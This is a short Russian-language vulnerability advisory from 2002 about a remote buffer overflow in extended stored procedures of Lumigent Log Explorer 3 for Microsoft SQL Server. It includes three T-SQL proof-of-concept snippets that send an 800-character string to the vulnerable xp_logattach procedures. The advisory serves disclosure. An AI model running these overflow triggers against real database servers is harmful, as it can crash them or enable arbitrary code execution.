Security Lab

Переполнение буфера в Lumigent Log Explorer

Дата публикации:20.06.2002
Всего просмотров:1399
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Lumigent Log Explorer - эксплорер журнала транзакций для Microsoft SQL Server 7/2000. Программа поставляется с дополнительными сохраненными процедурами, хранящимися в p_logattach.dll. Некоторые их этих процедур уязвимы к удаленному переполнению буфера и потенциально к выполнению произвольного кода.

Пример:

declare @bo varchar(8000) 
set @bo = replicate('A', 800) 
exec xp_logattach_StartProf @bo 

declare @bo varchar(8000) 
set @bo = replicate('A',800) 
exec xp_logattach_setport @bo 

declare @bo varchar(8000) 
set @bo = replicate('A',800) 
exec xp_logattach @bo
Уязвимость обнаружена в Lumigent Log Explorer version 3
Ссылки: Lumigent Log Explorer Extended Stored Procedures Buffer Overflow